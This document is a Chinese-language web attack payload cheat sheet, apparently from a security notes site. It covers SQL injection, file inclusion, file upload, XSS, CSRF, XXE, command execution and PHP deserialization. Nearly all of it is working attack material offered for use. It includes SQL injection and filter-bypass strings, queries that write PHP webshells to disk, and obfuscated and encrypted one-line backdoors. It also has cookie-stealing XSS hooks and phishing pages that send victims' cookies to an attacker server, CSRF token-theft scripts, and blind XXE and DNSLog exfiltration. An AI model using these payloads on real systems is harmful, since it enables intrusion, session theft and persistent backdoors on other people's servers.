Payload 总结

SQL注入

通用

select user(),version(),database()
select group_concat(schema_name) from information_schema.schemata
select group_concat(table_name) from information_schema.tables where table_schema=database()
select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='表名'

判断

// 字符型
?id=1xxx 			# 源码为 id='1xxx'， 正常
?id=1' and '1'='1 	# 源码为 id='1' and '1'='1'， 有回显
?id=1' and '1'='2 	# 源码为 id='1' and '1'='2'， 无回显

// 数字型
?id=1xxx 		# 源码为 id=1xxx， 报错
?id=1 and 1=1 	# 源码为 id=1 and 1=1， 有回显
?id=1 and 1=2 	# 源码为 id=1 and 1=2， 无回显

// 列数
1' ORDER BY 3--+
1' GROUP BY 3--+
1' union select @,@,@--+

注入

// 搜索框
1' and 1=1 and '%'='
%' and 1=1--'
%' and 1=1 and '%'='

// 报错，DML常用
' or updatexml(CHAR(126),(注入点),0x7e),null) or '
?id=1' and updatexml(null,concat(CHAR(126),(注入点),0x7e),null) --+
' or extractvalue(null,concat(CHAR(126),(注入点),0x7e)) or '
?id=1' and extractvalue(null,concat(CHAR(126),(注入点),0x7e)) --+
?id=1' union select 1, count(*), concat((注入点),0x7e,floor(rand(14)*2)) as x from 表名 group by x --+

// 布尔盲注
and (select count(*) from information_schma.tables where table_schema=database())>5 --+
and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>5 --+
and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97 --+

// 时间盲注
and if((select count(*) from information_schema.schemata)>5,1,sleep(5)) --+
and if((select length(schema_name) from information_schema.schemata limit 0,1)>5,1,sleep(5)) --+
and if((select ascii(substr(schema_name,1,1)) from information_schema.schemata limit 0,1)>97,1,sleep(5)) --+

// 二次注入
流程：注册用户名 admin' # => 登录 admin' # => 修改密码导致 admin 密码被改

// 二次编码
1%2527 and 0 --+

// 宽字节
%df%27 or 1=1 --+

// Out of band
select @@version into outfile '\\\\192.168.0.100\\temp\\out.txt'
select @@version into dumpfile '\\\\192.168.0.100\\temp\\out.txt'

// DNSLog
?id=1' and (select load_file(concat('\\\\',(注入点),'.xxxxx.dnslog.cn/abc'))) --+
?id=1' and (select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'))) --+
?id=1' and (select load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874))) --+

// 写shell
[...] union select 1,2,"<?php @eval($_POST['cmd']);?>" into outfile "C:/Program Files/ToolBoxs/PhpStudy/PHPTutorial/WWW/shell.php"
[...] UNION SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
[...] UNION SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>'
[...] UNION SELECT 1,2,3,4,5,0x3c3f70687020706870696e666f28293b203f3e into outfile 'C:\\wamp\\www\\pwnd.php'
[...] union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'
[...] UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPFILE 'C:/Program Files/EasyPHP-12.1/www/shell.php'
[...] UNION SELECT 0x3c3f7068702073797374656d28245f4745545b2763275d293b203f3e INTO DUMPFILE '/var/www/html/images/shell.php';

绕过

?id=-1 UNiOn SelEcT 1,2,3;%00
/*!11111select version()*/
select * from users where id=8E0union select 1,2,3
?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23
Select substr(database() from 1 for 1)
Select mid(database() from 1 for 1)
select * from news limit 1 offset 0
select user() like 'r%'
or 'swords'='sw'+'ords';EXEC('IN'+'SERT INTO'+'')
select%0a*%0afrom%0ausers;
select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64
select strcmp(left(database(),1),0x32)
?id=?id=11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 or 1 --+
?id=-1 union selselectect 1,2,3 --+
?id=1&id=-1'
?id=-1 union %2573%65%6c%65%63%74 1,2,database()
?id=1") union/*!88888xxxxx*/%23%0aselect 1,2,3 --+
?id=1") order/*!88888xxxxx*/by 3 --+
?id=") group by 3 --+
?id=--1' union select 1,2,group_concat(key.key) from /*sql-yunsuo*/.key  --+
?id=/*-1' union select 1,2,3 --+
?id=/*' union select 1,2,(select/**/`key` from `key`)--+`
?id=1'/*xxxxxxxx*/order/*xxxxxxxx*/by 3 --+
?id=10000'/*xxxxxxxx*/%23%0aunion%23%0a/*xxxxxxxx*/select 1,database/*xxxxxxxx*/(),group_concat(/*xxxxxxxx*/user.key/*xxxxxxxx*/from database.user) --+

等价替换

0x7573657273 => "users"
%6f%72%20%31%3d%31 => or 1=1
char(0x67)+char(0x75)+char(0x65)+char(0x73)+char(0x74) => "guest"
hex() bin() => ascii()
sleep(3) => benchmark(200000000,encode('a','b'))
concat_ws() => group_concat()
json_arrayagg() => group_concat() (MySQL >= 5.7.22)
mid() substr() => substring()
@@user => user()
@@datadir => datadir()
like => =
group by 1 => order by 1
+ => 空格
0x3a => :
0x3c62723e => <br>
%23%0a = 注释换行
and => &&
or => ||
xor => |
not => !
() => 空格
+ => 空格
%0a => 空格
%a0 => 空格
tab => 空格
空格空格 => 空格
/* */ => 空格
/*!88888xxxxxx*/ => 空格
// -- /* */ # --+ --- ;%00 --a /*!表示不注释*/ /*!88888当数字大于mysql版本时算注释*/

文件包含

常见的敏感信息路径

Windows

// 查看系统版本
c:\boot.ini

// IIS配置文件
c:\windows\system32\inetsrv\MetaBase.xml

// 存储Windows系统初次安装的密码
c:\windows\repair\sam

// MySQL配置
c:\ProgramFiles\mysql\my.ini

// MySQL root密码
c:\ProgramFiles\mysql\data\mysql\user.MYD

// php 配置信息
c:\windows\php.ini

Linux/Unix

// 账户信息
/etc/passwd

// 账户密码文件
/etc/shadow

// Apache2默认配置文件
/usr/local/app/apache2/conf/httpd.conf

// 虚拟网站配置
/usr/local/app/apache2/conf/extra/httpd-vhost.conf

// PHP相关配置
/usr/local/app/php5/lib/php.ini

// Apache配置文件
/etc/httpd/conf/httpd.conf

// mysql 配置文件
/etc/my.conf

其他

可以通过 phpinfo() 中的 session.save_path 查看 session 的存储位置，默认为 /var/lib/php/session

payload

php?filename=../../../../../../../boot.ini%00

// Windows下目录最大长度为256字节，超出的部分会被丢弃；
// Linux下目录最大长度为4096字节，超出的部分会被丢弃。
php?filename=test.txt/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
php?filename=test.txt.................................................................................................................................................................................................................................................................................................................................................

// 伪协议
php?filename=http://192.168.91.133/FI/php.txt
php?filename=http://192.168.91.133/FI/php.txt%3f (?)
php?filename=http://192.168.91.133/FI/php.txt%23 (#)
php?filename=http://192.168.91.133/FI/php.txt%20 ( )

php?filename=php://filter/convert.base64-encode/resource=xxx.php
php?filename=php://filter/read=convert.base64-encode/resource=xxx.php

php?filename=php://input	post => <?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');?>

php?filename=file://c:/boot.ini

php?filename=data://text/plain;base64;PD9waHAgcGhwaW5mbygpOw==

// 将shell.php用zip协议打成压缩包，并将压缩包命名为shell.png
php?filename=phar://shell.png/shell.php		post => cmd=phpinfo();
php?filename=zip://shell.png%23shell.php    post => cmd=phpinfo();

文件上传

php写shell

// FILE_APPEND 如果文件 filename 已经存在，追加数据而不是覆盖。LOCK_EX 在写入时获得一个独占锁。
file_put_contents("xxx.php", '<?php @eval($_POST["cmd"]?>', FILE_APPEND | LOCK_EX);
fwrite(fopen("xxx.php","a+"), '<?php @eval($_POST["cmd"]?>');
fputs(fopen("xxx.php","a+"), '<?php @eval($_POST["cmd"]?>');

绕马

<?php asset($_POST["cmd"]);?>
<?php $_POST["a"]($_POST["b"]);?>	post => a=assert&b=phpinfo()
<?php $a = substr_replace("assxxx","ert",3);$a($_POST["cmd"]);?>
<?php function test($a){$a($_POST["cmd"]);} test("assert");?>
<?php function test($func,$param){return $func($param);} test("assert",$_POST["cmd"]);?>
<?php call_user_func($_POST["a"],$_POST["b"]);?>	post => a=assert&b=phpinfo()
<?php forward_static_call_array("assert",array($_POST["cmd"]));?>
<?php $a=base64_decode($_POST["cmd"]);assert($a);?>
<?php $a = base64_decode("YXNzZXJ0");$a($_POST["cmd"]);?>
<?php $a = ("!"^"@")."ssert";$a($_POST["cmd"]);?>
<?php $_ = ("$"^"{}").("~"^".").("/"^"`").("-"^"~").("("^"|");${$_}["a"](${$_}["b"]);?>
<?php $a = chr(97).chr(115).chr(115).chr(101).chr(114).chr(116);$a(${chr(95).chr(80).chr(79).chr(83).chr(84)}[chr(34).chr(99).chr(109).chr(100).chr(34)]);?>
<?php class Test{var $a;var $b;function __construct($a, $b) {$this->a = $a;$this->b = $b;}function demo() {array_map($this->a,$this->b);}} $t = new Test("assert",array($_POST["cmd"]));$t->demo();?>

// 在线转换地址：https://www.toolfk.com/tools/convert-php.html

// 原始
<?php @eval($_POST['cmd']);?>

// 加密
<?php $O00OO0 = urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
$O00O0O = $O00OO0{
    3} . $O00OO0{
    6} . $O00OO0{
    33} . $O00OO0{
    30};
$O0OO00 = $O00OO0{
    33} . $O00OO0{
    10} . $O00OO0{
    24} . $O00OO0{
    10} . $O00OO0{
    24};
$OO0O00 = $O0OO00{
    0} . $O00OO0{
    18} . $O00OO0{
    3} . $O0OO00{
    0}
    . $O0OO00{
        1} . $O00OO0{
        24};
$OO0000 = $O00OO0{
    7} . $O00OO0{
    13};
$O00O0O .= $O00OO0{
    22} . $O00OO0{
    36}
    . $O00OO0{
        29} . $O00OO0{
        26} . $O00OO0{
        30} . $O00OO0{
        32} . $O00OO0{
        35} . $O00OO0{
        26} . $O00OO0{
        30};
eval($O00O0O("JE8wTzAwMD0iSlhLaUNzSFRCenRFZ2t1UFJuVWxxV29lYnlORFZ4ckZPdmpMcEFhU21jd2ZkUWhHWllJTVFsbXlIRnZTR3hrVXBoc1p0UEJxb0t1TkVpblJ6SmZBY3dDVGpYTURkZ0xyWVdWYmFlSU9aUjlMTXZYcFdiejJlS0x1UUE5V1MxbkJLaVlDRUtXUGxEaDdaeDQ9IjsgIAogICAgICAgIGV2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksICAgIAogICAgICAgICRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));
?>

// 混淆
<?php function EDnRK($kYsyl)
{
    $kYsyl = gzinflate(base64_decode($kYsyl));
    for ($i = 0; $i < strlen($kYsyl); $i++) {
        $kYsyl[$i] = chr(ord($kYsyl[$i]) - 1);
    }
    return $kYsyl;
}
eval(EDnRK("U1QEAce08qRcTdWEwICQ0BiNlLxUjTgtGwd7AA=="));
?>

改包绕过

Content-Type: image/jpeg
// 先上传 .htaccess 文件，允许解析当前目录的 .jpg 文件，.htaccess 文件写入如下内容
SetHandler application/x-httpd-php
Content-Disposition: filename="shell.phtml"
Content-Disposition: filename="shell.php.xxx"
Content-Disposition: filename="shell.pHP"
Content-Disposition: filename="shell.php "
Content-Disposition: filename="shell.php."
Content-Disposition: filename="shell.php::$DATA"
Content-Disposition: filename="shell.php::$DA::$DATATA"
Content-Disposition: filename="shell.php. ."
Content-Disposition: filename="shell.pphphp"
Content-Disposition: filename="shell.php/."

// 修改一句话木马文件，在头部加上 GIF89a，将文件重命名为 .gif 后缀，再利用文件包含
?file=upload/4420220324224731.gif

// 00截断(GET)
POST /upload-labs/Pass-12/index.php?save_path=../upload/shell.php%00
Content-Disposition: filename="shell.jpg"
Content-Type: image/jpeg

// 00截断(POST)
Content-Disposition: filename="shell.jpg"
Content-Type: image/jpeg
在Hex中修改路径：../upload/ => ../upload/shell.php0 => ../upload/shell.php

// 二次渲染绕过，上传一个正常图片，然后下载下来与原来的图片做对比，用工具找到没有发生改变的地方，写入一句话，保存后再次上传
// 条件竞争绕过，先开启 python 请求脚本，再用 BurpSuite 爆破模块的 Null payloads 模式使用多线程一直发包上传一句话木马
// 7z后缀并不被Apache服务器所识别，却在上传文件名后缀的白名单中，可以利用Apache的解析漏洞将上传的7z后缀文件当做php文件解析

XSS

反射型

漏洞服务器

vul-page-reflected.php

<?php
header('content-type:text/html;charset=utf-8');
session_start();
if (isset($_GET['action'])) {
    $action = $_GET['action'];
    // ?action=<script>alert(1)</script>
    echo $action;
    if ($action == 'logout') {
        unset($_SESSION['name']);
        echo '成功退出';
        header("refresh:1;url='./vul-page-reflected.php'");
    } else {
        header("refresh:1;url='./vul-page-reflected.php'");
    }
} else {
    if (isset($_SESSION['name'])) {
        $name = $_SESSION['name'];
        echo "<a href='./vul-page-reflected.php?action=logout'>退出</a><br>";
        echo "欢迎 $name , 尊敬的vip 请留言!";
        echo "<h3>请留言：</h3>";
        echo "<form action='' method='post'>";
        echo "<textarea cols=30 rows=5 name='message'></textarea><br>";
        echo "<input type='submit' value='提交'></form>";
        if (isset($_POST['message'])) {
            echo " $name 说: {$_POST['message']}";
        }
    } else if (isset($_POST['name']) && isset($_POST['passwd'])) {
        $name = $_POST['name'];
        $passwd = $_POST['passwd'];
        if ($name == 'admin' && $passwd == '123456') {
            $_SESSION['name'] = $name;
            header('refresh:1;url="./vul-page-reflected.php"');
        } else {
            echo '账户或密码错误!';
            header('refresh:1;url="./vul-page-reflected.php"');
        }
    } else {
        echo "<h1>登录</h1>";
        echo "<form action='' method='post'>";
        echo "账户：<input type='text' name='name'><br>";
        echo "密码：<input type='password' name='passwd'><br>";
        echo "<input type='submit' value='ok'></form>";
    }
}

模拟演示-GET型

攻击者服务器

/xss/cookie-get.php

<?php
$cookie = $_GET['cookie'];
file_put_contents('cookie.txt',$cookie);

/xss/hook-get.js

xmlhttp = new XMLHttpRequest();
xmlhttp.open(
    "get",
    "http://[攻击者服务器IP]/xss/cookie-get.php?cookie=" + document.cookie,
    true // 开启异步
);
xmlhttp.send();

钓鱼页面

xss-get.html

<!DOCTYPE html>
<html lang="en">
	<head>
		<meta charset="UTF-8" />
		<title>XSS-GET</title>
	</head>

	<body>
		<!-- 直接跳转到攻击者服务器 -->
		<a
			href="http://[漏洞服务器IP]/vul-page-reflected.php/?name=<script>document.location='http://[攻击者服务器IP]/xss/cookie-get.php?cookie='%2Bdocument.cookie</script>"
			>点我有惊喜</a
		>
		<!-- 用 ajax 异步访问攻击者服务器 -->
		<a
			href="http://[漏洞服务器IP]/vul-page-reflected.php/?name=<script src='http://[攻击者服务器IP]/xss/hook-get.js'></script>"
			>点我也有惊喜</a
		>
	</body>
</html>

模拟演示-POST型

攻击者服务器

/xss/cookie-post.php

<?php
$cookie = $_POST['cookie'];
file_put_contents('cookie.txt',$cookie);

/xss/hook-post.js

xmlhttp = new XMLHttpRequest();
xmlhttp.open(
	"post",
	"http://[攻击者服务器IP]/xss/cookie-post.php",
	true // 开启异步
);
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlhttp.send("cookie=" + document.cookie);

钓鱼页面

xss-post.html

<!DOCTYPE html>
<html lang="en">
	<head>
		<meta charset="UTF-8" />
		<title>XSS-POST</title>
	</head>

	<body>
		<form action="http://[漏洞服务器IP]/vul-page-reflected.php" method="post">
			<input
				type="hidden"
				name="message"
				value="<script src='[攻击者服务器IP]/xss/hook-post.js'></script>"
			/>
			<input type="submit" value="点我有惊喜" />
		</form>
	</body>
</html>

存储型

漏洞服务器

vul-page-stored.php

<?php
if (isset($_POST['message'])) {
	$message = $_POST['message'];
	file_put_contents('message.txt', $message);
}
?>
<html>

<head>
	<meta charset="utf-8">
	<title>Stored XSS</title>
</head>

<body>
	<form action="" method="post">
		留下你的评论：<textarea cols="30" rows="5" name="message" /></textarea>
		<input type="submit" value="提交">
	</form>
	<p>游客说：
		<?php
		if (file_exists('message.txt')) {
			echo file_get_contents('message.txt');
		} else {
			echo "暂无评论！";
		}
		?>
	</p>
</body>

</html>

DOM型

漏洞服务器

vul-page-dom.php

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <title>DOM XSS</title>
</head>

<body>
    <div>name:
        <script>
            if (document.location.href.indexOf("name=") >= 0) {
                var name = document.location.href.substring(document.location.href.indexOf("name=") + 5);
                document.write(decodeURI(name));
            } else {
                document.write('张三');
            }
        </script>
    </div>
    <form>
        输入大名：<input name="name">
        <input type="submit" value="ok">
    </form>
</body>

</html>

payload

// 常规操作
<script>alert(1)</script>
<script src="http://[ip]/[my.js]"></script>

// src属性绕过
<img src=x onerror=alert(1)>
<img/src=x onerror=alert(1)>
<video src=x onerror=alert(1)>
<audio src=x onerror=alert(1)>

// iframe 绕过 
<iframe src="javascript:alert(1)">
<iframe onload="alert(1)">

// a标签绕过
<a href="javascript:onclick=alert(1)">test</a>
<a href="javascript:alert(1)">test</a>

// script绕过
<scRiPt>alert(1)</scrIPt>
<scr<script>ipt>alert(1)</scr<script>ipt>

// 事件绕过
<svg onload=alert(1)>
<body onload=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<video><source onerror="javascript:alert(1)">

// 圆括号绕过
<a onmouseover="javascript:window.onerror=alert;throw 1"></a>
<img src=x onerror="javascript:window.onerror=alert;throw 1">
<script>alert`1`</script>
<img src=1 onerror=location="javascript:"+"aler"+"t%281%29">

// 在不需要任何用户交互的情况下执行脚本
<style onreadystatechange=alert(1)></style>
<iframe onreadystatechange=alert(1)></iframe>
<object onerror=alert(1)></object>
<img type=image src=valid.gif onreadystatechange=alert(1)>
<input type=image src=valid.gif onreadystatechange=alert(1)>
<body onbeforeactivate=alert(1)></body>
<video src=1 onerror=alert(1)></video>
<audio src=1 onerror=alert(1)>

// 伪协议
<object data=javascript:alert(1)></object>
<iframe src=javascript:alert(1)></iframe>
<event-source src=javascript:alert(1)></event-source>

// < 被转义 (点击事件绕过)
' onclick='alert(1)
" onclick="alert(1)

// script 被过滤，alert 被过滤 (换标签绕过)
<a onclick="alert(1)">test</a>

// < 被转义，script 被转义 (大小写绕过)
" ONclick="alert(1)
"><ScRiPt>alert(document.cookie)</ScRiPt>

// 编码绕过
"%3e%3cscript%3ealert(document.cookie)%3c/script%3e

// script 被过滤，< > 被转义 (双写绕过：绕过on)
" oonnclick="alert(1)
"><scr<script>ipt>alert(document.cookie)</scr</script>ipt>
<img o[%00]nerror=alert(1) src=a>

// script 被转义，< > 被转义 (伪协议绕过)
"><a href="javascript:alert(1)">test</a>"

// javascript 中的 i 被过滤 (HTML实体字符绕过)
javascr&#x69;pt:alert(1)
&#x3C;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x3C;&#x2F;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;

// script、/、空格 被替换为 &nbsp; (换行绕过：%00 %09 %0d %0a)
<img%0Dsrc=x%0Donerror="alert(1)"/>
<img src=x onerror="javascript:window.onerror=alert;throw 1">

// <input type="text" name="name" value="test-text" >
"><script>alert(1)</script>

// <script>var a='test-text'; var b=123;...</script>
'; alert(1); var foo='

// <a href="test-text">Click here</a>html
javascript:alert(1);

CSRF

钓鱼页面

<html>
	<!-- CSRF PoC - generated by Burp Suite Professional -->
	<body>
		<form
			action="http://[漏洞服务器IP]/csrf-bank/change.php"
			method="post"
			id="csrf"
		>
			<input type="hidden" name="number" value="200" /><br />
			<input type="hidden" name="name" value="hacker" /><br />
			<input type="submit" value="Submit request" />
		</form>
	</body>
	<script>
        // 自动提交表单
		document.getElementById("csrf").submit();
	</script>
</html>

referer绕过

钓鱼页面

<!DOCTYPE html>
<html lang="en">
	<head>
		<meta charset="UTF-8" />
		<title>CSRF利用</title>
	</head>
	<body>
		<a
			id="demo"
			href="http://[漏洞服务器IP]/dvwa/vulnerabilities/xss_r/?name=<scriPt src=http://[攻击者服务器IP]/csrf/hook.js></scriPt>"
		>
			点我有惊喜！
		</a>
	</body>
</html>

/csrf/hook.js

xmlhttp = new XMLHttpRequest();
xmlhttp.open(
	"get",
	"http://[漏洞服务器IP]/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change"
);
xmlhttp.send();

token绕过

钓鱼页面

<!DOCTYPE html>
<html lang="en">
	<head>
		<meta charset="utf-8" />
		<title>token类型CSRF</title>
	</head>
	<body>
		<h1>token类型CSRF利用</h1>
		<a
			href="http://[漏洞服务器IP]/dvwa/vulnerabilities/xss_d/?default=Spanish#<script src=http://[攻击者服务器IP]/csrf/hook.js></script>"
		>
			点我有惊喜！
		</a>
	</body>
</html>

/csrf/hook.js

var url = "http://[漏洞服务器IP]/dvwa/vulnerabilities/csrf/";
if (window.XMLHttpRequest) {
	xmlhttp = new XMLHttpRequest();
} else {
	// 老版本的 Internet Explorer （IE5 和 IE6）使用 ActiveX 对象
	xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
}
var count = 0;
xmlhttp.withCredentials = true;
xmlhttp.onreadystatechange = function () {
	if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
		var content = xmlhttp.responseText;
		var pattern = "user_token' value='(.*?)'";
		var match = content.match(pattern);
		var token = match[1];
		var new_url =
			"http://[漏洞服务器IP]/dvwa/vulnerabilities/csrf/?user_token=" +
			token +
			"&password_new=password&password_conf=password&Change=Change";
		if (count == 0) {
			count++;
			xmlhttp.open("GET", new_url, false);
			xmlhttp.send();
		}
	}
};
xmlhttp.open("GET", url, false);
xmlhttp.send();

SSRF

XXE

有回显

payload

<?xml version="1.0"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>

无回显

攻击者服务器

attack.dtd

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=[目标文件及路径]">
<!ENTITY % payload "<!ENTITY &#x25; getcontent SYSTEM 'http://[攻击者服务器IP]/xxe/getcontent.php?content=%file;'>">
%file;
%payload;
%getcontent;

getcontent.php

<?php
$content = $_GET['content'];
$content = base64_decode($content);
file_put_contents("xxe_results.txt", $content);

payload

<?xml version="1.0"?>
<!DOCTYPE root[
    <!ENTITY % xxe SYSTEM "http://[攻击者服务器IP]/xxe/attack.dtd">
    %xxe;
]>

CRE

代码执行

file_put_contents("xxx.php", '<?php @eval($_POST["cmd"]?>', FILE_APPEND | LOCK_EX);
fwrite(fopen("xxx.php","a+"), '<?php @eval($_POST["cmd"]?>');
fputs(fopen("xxx.php","a+"), '<?php @eval($_POST["cmd"]?>');

命令执行

|ls
|cat${IFS}key.ph*
|cat${IFS}key.ph?
|echo "<?php @eval(\$_POST['cmd']);?>" > shell.php
|cat shell.php

反序列化

访问控制符：public/protected/private

<?php
header("content-type:text/html;charset=utf-8;");
class People
{
	public $name = "张三";
	protected $age = 18;
	private $money = 100.5;
	public function __construct($name, $age, $money)
	{
		$this->name = $name;
		$this->age = $age;
		$this->money = $money;
	}
	public function hello()
	{
		echo "My name is $this->name ,my age is $this->age ! ";
		echo "I have $this->money RMB!";
	}
}

$obj = new People("李四", 20, 175.5);
echo serialize($obj);

// O:6:"People":3:{s:4:"name";s:6:"李四";s:6:"*age";i:20;s:13:"Peoplemoney";d:175.5;}

$str = 'O:6:"People":3:{s:4:"name";s:6:"王五";S:6:"\00*\00age";i:22;S:13:"\00People\00money";d:180.5;}';
$obj = unserialize($str);
$obj->hello();

// My name is 王五 ,my age is 22 !
// I have 180.5 RMB!

注意：

属性数量大于真实数量时，会绕过 __wakeup 方法
protected 属性写成 S:6:"\00*\00age";，其中 \00 表示空格
private 属性写成 S:13:"\00People\00money";，其中 People 时类名

数组：

a:1:{i:0;O:6:"readme":1:{s:6:"source";s:8:"flag.php";}}

Previous业务逻辑漏洞 Next渗透测试流程

Last updated 3 years ago

hashtagSQL注入

hashtag通用

hashtag判断

hashtag注入

hashtag绕过

hashtag等价替换

hashtag文件包含

hashtag常见的敏感信息路径

hashtagpayload

hashtag文件上传

hashtagphp写shell

hashtag绕马

hashtag改包绕过

hashtagXSS

hashtag反射型

hashtag存储型

hashtagDOM型

hashtagpayload

hashtagCSRF

hashtagreferer绕过

hashtagtoken绕过

hashtagSSRF

hashtagXXE

hashtag有回显

hashtag无回显

hashtagCRE

hashtag代码执行

hashtag命令执行

hashtag反序列化

hashtag访问控制符：public/protected/private

SQL注入

通用

判断

注入

绕过

等价替换

文件包含

常见的敏感信息路径

payload

文件上传

php写shell

绕马

改包绕过

XSS

反射型

存储型

DOM型

payload

CSRF

referer绕过

token绕过

SSRF

XXE

有回显

无回显

CRE

代码执行

命令执行

反序列化

访问控制符：public/protected/private